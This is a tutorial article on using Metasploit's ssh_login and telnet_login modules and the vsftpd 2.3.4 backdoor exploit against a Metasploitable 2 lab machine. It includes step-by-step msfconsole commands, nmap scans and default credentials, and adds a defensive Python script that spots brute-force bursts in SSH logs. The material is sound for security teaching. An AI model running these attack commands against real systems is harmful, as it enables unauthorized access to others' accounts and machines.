
Brute Force Attack in Metasploit

Last Updated : 17 Apr, 2024

A brute force attack is one of the most famous and widely known types of cyber attack. It uses a trial-and-error method to guess login credentials or encryption keys, or to find a hidden webpage. If someone repeatedly and unsuccessfully tries to log in to an account or network, it appears to be a brute force attack. In a brute force attack, the attacker supplies a wordlist, and the Metasploit auxiliary modules guess passwords from it. The scripts keep running until they get a hit or have tried every credential in the list.

Example 1: Performing Brute-Force SSH Service with Metasploit

To follow this example you must have Kali Linux and Metasploitable 2 or 3 installed. We are going to use Metasploitable 2 as our target machine and brute force it using the Metasploit Framework. Follow the steps below to perform the attack.

Step 1: Start both machines, Kali Linux and Metasploitable. I'm using VirtualBox to run both machines simultaneously; you can do the same. Check the IP addresses so that we know the target IP address, using the command:

$ ifconfig
Checking IP Address

 

Step 2: Now perform an Nmap scan to get the list of open ports on the target machine. To do so, use the command:

$ nmap -sS -sV 192.168.10.3    # the IP address of the target machine

This lists all the open ports and the services running on them.

Nmap Scan

 

In the above image, you can see several open ports and the services running on them.

Step 3: You can see that port 22/tcp is running the SSH service, version OpenSSH 4.7p1 Debian. We are going to brute force this port from our Kali Linux virtual machine.

Open the MSF console in the terminal by typing the command below:

msfconsole
Opening msfconsole

 

Now search for the ssh_login auxiliary module using the search command in msfconsole, as you can see in the image below.

search ssh
searching ssh modules

 

We will use auxiliary/scanner/ssh/ssh_login from the results. To use this module, type the command:

msf6 > use auxiliary/scanner/ssh/ssh_login

Now let's see the options available for setting our target. To see them, use the show options command.

msf6 auxiliary(scanner/ssh/ssh_login) > show options
Using ssh_login module

 

You can see in the above image that there are several options to set before launching the attack.

Step 4: Now set the required options and launch the attack.

Set the required options with the set command, as shown in the image below.

set RHOST 192.168.10.3
set THREADS 3
set STOP_ON_SUCCESS true
set VERBOSE true
Setting RHOST, THREADS

 

After these options are set, we need to supply a password list, as the program doesn't have one. To show a successful attack, I have created a list that contains usernames and passwords separated by a space, as the description of USERPASS_FILE in the image above says.

Now set the password list with the set command, as shown in the image below:

set USERPASS_FILE (path to the password list)
Setting username and password files

 

Step 5: We are all set and can now launch the attack and watch each attempt in the terminal. To launch the attack, use the run command.

After you type the run command, it starts brute forcing the system, and when the attack is successful it returns the username and password. As you can see in the image below, the default password for Metasploitable 2 is msfadmin, the username is also msfadmin, and the attack was successful.

Brute-Forcing SSH
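
What the run in Step 5 looks like from the target's side, as an added example that is not part of the original article: the sshd auth log shows a burst of failed password lines from one address, then an accepted login. The log lines are constructed, and the source addresses 192.168.10.2 and 192.168.10.50, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in OpenSSH auth-log format; 192.168.10.2 and .50 are assumed hosts.
SAMPLE_LOG = """\
Apr 17 10:14:40 metasploitable sshd[4700]: Failed password for user from 192.168.10.50 port 51000 ssh2
Apr 17 10:14:52 metasploitable sshd[4701]: Accepted password for user from 192.168.10.50 port 51002 ssh2
Apr 17 10:15:01 metasploitable sshd[4711]: Failed password for invalid user admin from 192.168.10.2 port 40122 ssh2
Apr 17 10:15:01 metasploitable sshd[4712]: Failed password for root from 192.168.10.2 port 40124 ssh2
Apr 17 10:15:02 metasploitable sshd[4713]: Failed password for invalid user test from 192.168.10.2 port 40126 ssh2
Apr 17 10:15:02 metasploitable sshd[4714]: Failed password for invalid user guest from 192.168.10.2 port 40128 ssh2
Apr 17 10:15:03 metasploitable sshd[4715]: Failed password for msfadmin from 192.168.10.2 port 40130 ssh2
Apr 17 10:15:04 metasploitable sshd[4716]: Failed password for invalid user oracle from 192.168.10.2 port 40132 ssh2
Apr 17 10:15:05 metasploitable sshd[4717]: Accepted password for msfadmin from 192.168.10.2 port 40134 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Map each source IP with >= threshold failures inside `window` to its
    peak failure count and any logins accepted after it was flagged."""
    recent = defaultdict(deque)  # ip -> timestamps of failures still in the window
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a password-auth line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog has no year
        ip = m["ip"]
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                hit = findings.setdefault(ip, {"peak_failures": 0, "accepted": []})
                hit["peak_failures"] = max(hit["peak_failures"], len(q))
        elif ip in findings:
            # A success right after a guessing burst means a credential was found.
            findings[ip]["accepted"].append(m["user"])
    return findings

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

The single failed and then successful login from 192.168.10.50 stays below the threshold and is not reported, which is the difference between a mistyped password and a wordlist run.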

 

Example 2: Performing an Attack on FTP Server with Metasploit

Step 1: Start both machines, Kali Linux and Metasploitable. I'm using VirtualBox to run both machines simultaneously; you can do the same. Check the IP addresses so that we know the target IP address, using the command:

$ ifconfig
Checking IP Address

 

Step 2: Now perform an Nmap scan to get the list of open ports on the target machine. To do so, use the command:

$ nmap -sS -sV 192.168.10.3    # the IP address of the target machine

This shows the versions of the services and the list of open ports on the target machine.

Nmap Scan

 

Step 3: In the above output you can see an open FTP service running on port 21/tcp, version vsftpd 2.3.4. We are going to exploit this vulnerability using Metasploit in a few simple steps. Note that this is an exploit module for the backdoor in vsftpd 2.3.4, not a credential-guessing module.

Open msfconsole and type the command for using the vsftpd exploit:

$ msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

Now that the exploit is selected, let's set RHOST, i.e. the target IP address.

searching FTP modules

 

The show options command shows the options that we need to provide and those that are set by default:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

We can see in the above image that we have to specify RHOST and RPORT. RPORT is set to 21 by default, which is what we want, so let's set RHOST to the target IP address and run the exploit.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.10.3
Setting RHOST

 

Now that we have provided all the parameters, we can run the exploit and see if it gives us access to the machine. To run an exploit, use the command:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
Brute-Forcing FTP

 

You can see in the above output we have successfully gained access to the machine by exploiting the FTP server using Metasploit.

Example 3: Performing an Attack on Telnet Service with Metasploit

Step 1: Start both machines, Kali Linux and Metasploitable. I'm using VirtualBox to run both machines simultaneously; you can do the same. Check the IP addresses so that we know the target IP address, using the command:

$ ifconfig

Step 2: Now perform an Nmap scan to get the list of open ports on the target machine. To do so, use the command:

$ nmap -sS -sV 192.168.0.108    # the IP address of the target machine

The above two steps are the same as we have done for SSH and FTP.

Step 3: Now open msfconsole and search for the telnet auxiliary modules. To do so, type the command:

msf6 > search type:auxiliary telnet
searching Telnet modules

 

Step 4: Now select the auxiliary module that we will use to perform a brute force attack on port 23 of the target machine, and check which options we have to set to perform the attack.

msf6 > use auxiliary/scanner/telnet/telnet_login
msf6 auxiliary(scanner/telnet/telnet_login) > show options
showing options for telnet_login module

 

Step 5: We need to set several options, such as RHOST, PASS_FILE, and USER_FILE. You can create these files or download them from the internet; I have created them locally to show how to use them. Finally, we need to set STOP_ON_SUCCESS to true. To do all of this, refer to the images below.

set PASS_FILE /home/lucifer/Desktop/pass.txt
set USER_FILE /home/lucifer/Desktop/user.txt
Setting username and password files

 

set RHOST 192.168.0.108
set STOP_ON_SUCCESS true
Setting RHOST

 

Step 6: Now we are all set to run the exploit. To do so, simply type the run command.

run

Brute-Forcing Telnet

In the above image, you can see that we have successfully found the matching credentials msfadmin:msfadmin; msfadmin is the default password for Metasploitable machines.

Conclusion

This is how we can use Metasploit to brute force a system or a target machine. Remember that I have shown only one way to do this; there are several other ways that you can explore and test on your own, such as using different services. I have used the SSH service as the target here, but you can also try it against a website or webpage: create a simple HTML form that accepts usernames and passwords, connect it to a database like MySQL, and then perform the brute force attack on that webpage to practice and learn.


